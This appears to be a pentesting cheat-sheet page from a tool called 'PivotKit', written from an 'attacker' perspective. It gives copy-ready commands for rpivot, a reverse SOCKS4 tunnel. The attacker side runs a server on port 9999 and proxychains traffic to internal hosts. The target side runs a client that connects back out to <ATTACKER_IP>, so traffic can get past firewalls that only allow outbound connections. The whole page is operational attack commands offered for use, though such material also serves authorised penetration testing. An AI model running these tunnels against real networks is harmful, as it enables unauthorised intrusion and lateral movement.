PivotKit

Attacker / Pentester Perspective

Live

Python 2 reverse SOCKS4 tunnel — useful when only outbound HTTP is allowed from the target. Learn about this tool.

Server (Attacker)

Client (Target)

WinLinux

On Attacker (Server)

1
python2 rpivot.zip server --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080Copy
2
# Add to /etc/proxychains.conf: # socks4 127.0.0.1 1080Copy
3
# Example: proxychains curl http://<INTERNAL_HOST>Copy

On Target (Client)

4
python2 rpivot.zip client --server-ip <ATTACKER_IP> --server-port 9999Copy